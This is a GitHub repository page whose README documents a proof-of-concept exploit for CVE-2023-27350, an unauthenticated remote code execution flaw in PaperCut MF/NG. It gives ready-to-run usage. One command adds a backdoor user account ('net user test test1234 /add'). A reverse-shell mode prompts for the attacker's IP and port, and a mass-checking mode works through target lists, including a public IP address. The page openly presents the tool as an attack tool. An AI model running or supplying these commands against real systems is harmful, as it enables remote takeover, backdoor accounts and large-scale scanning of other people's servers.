Skip to content

adhikara13/CVE-2023-27350

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2023-27350 Exploit POC

This is a Proof of Concept (POC) exploit for CVE-2023-27350, a vulnerability found in PaperCut MF/NG that allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.

Requirements

Before using this exploit, make sure you have installed the following libraries:

pip install -r requirements.txt

Usage

python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

Options

  • -u, --url: The URL of the target PaperCut MF/NG application (e.g., http://target-ip:9191).
  • -c, --command: The command to execute on the target system.
  • --reverse-shell: Use a reverse shell payload to execute commands on the target system.
  • -f, --file: Check multiple targets from a file (e.g., file.txt).

Example

Execute Command

To execute a command on the target system, use the -c option:

python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

Reverse Shell

To use a reverse shell payload to execute commands on the target system, use the --reverse-shell option. You will be prompted to enter your IP address and port number:

python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>

Mass Checking

To check multiple targets from a file, use the -f option. The format of the file should be ip_address:port:

python CVE-2023-27350.py -f file.txt

Formatting the file.txt

When using the mass checking option with the file.txt input, make sure that the contents of the file are formatted correctly.

Each line of the file should contain the IP address and port number of a target, separated by a colon :. For example:

110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080

Make sure there are no extra spaces or characters in between the IP address, colon, and port number. Also, make sure that each line only contains one IP address and port number.

Credits

This is a forked version of the horizon3ai/CVE-2023-27350 repository. All credits for the original exploit go to the authors.

About

Exploit for Papercut CVE-2023-27350. [+] Reverse shell [+] Mass checking

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages